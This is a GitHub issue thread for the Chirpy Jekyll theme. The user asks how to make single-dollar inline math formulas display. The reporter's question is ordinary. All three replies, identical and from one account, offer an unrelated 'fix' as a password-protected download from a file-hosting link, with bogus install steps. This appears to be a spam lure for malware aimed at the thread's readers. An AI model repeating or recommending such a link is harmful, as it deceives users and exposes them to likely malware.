### ISSUE TITLE
Formula display error, inline formula $ $ can not be displayed？

### ISSUE THREAD

**Issue by deepConnectionism** [cotes2020/jekyll-theme-chirpy#1925]
### Checklist

- [X] I have read and accepted the [contributing guidelines](https://github.com/cotes2020/jekyll-theme-chirpy/blob/master/docs/CONTRIBUTING.md).

### How did you create the site?

Generated from `chirpy-starter`

### Describe the bug

Do not support \$... \$ inline formula, inline formula need \$\$ ... \$\$ can be supported, this and other platforms are not compatible, how should be modified?

### Steps To Reproduce

math

how to support \$... \$ inline formula?

### Expected Behavior

support \$... \$ inline formula

### Environment

- Ruby: 
- Jekyll: 
- Chirpy: 
- 
bundle info jekyll-theme-chirpy
  * jekyll-theme-chirpy (7.0.1)
        Summary: A minimal, responsive, and feature-rich Jekyll theme for technical writing.
        Homepage: https://github.com/cotes2020/jekyll-theme-chirpy
        Documentation: https://github.com/cotes2020/jekyll-theme-chirpy/#readme
        Source Code: https://github.com/cotes2020/jekyll-theme-chirpy
        Wiki: https://github.com/cotes2020/jekyll-theme-chirpy/wiki
        Bug Tracker: https://github.com/cotes2020/jekyll-theme-chirpy/issues
        Path: /home/h/Documents/blogs/deepConnectionism.github.io

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
